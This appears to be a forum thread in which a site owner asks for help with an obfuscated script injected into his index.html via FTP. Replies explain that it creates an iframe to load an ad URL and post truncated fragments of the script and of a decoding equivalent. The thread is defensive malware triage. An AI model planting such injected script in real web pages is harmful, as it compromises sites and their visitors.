Strange script on FTP?
Hello everyone,
I discovered a strange code/script/whatever on my FTP, it was added to my index.html. I think this is a pretty bad malware script (since as well chrome as well as my antivirus software absolutely do not like it), and I also think that all those numbers included can be "translated" or "decoded". I also tried googleing for a ANSII converter, but I couldnt translate it. Can you guys help me out? Thanks in advance, Lukas Code:
<!--c3284d--><script>try{1-prototype;}catch(asd){x=2;} |
Basically it places an ad on your site. It runs a JavaScript it will create a iframe with an URL containing the ad.
|
Hi.
Here is almost equivalent python script with less obfuscation: Code:
f = [4, 0, 91, 108, 100, 88, 107, 95, 100, 101, 22, 91, 105, 99, 54, 91, 90, Code:
|
Here is how to decode it. :)
|
Thanks already!
But now, is that a good thing or a bad thing? Also, I found this in my include.php page: Code:
#c3284d# |
Hi.
Uncompressing gives the same script: Code:
<script>try{1-prototype;}catch(asd){x=2;} |
Quote:
|
Umm. I would then prefer just to clean up the files that are infected with that evil, evil bastard, clean up the complete server and renew some passwords, and then get the files back up and running.
If that is not a good idea, please prevent me from doing that by giving a quick answer ;). Thanks ! |
All times are GMT -5. The time now is 01:25 AM. |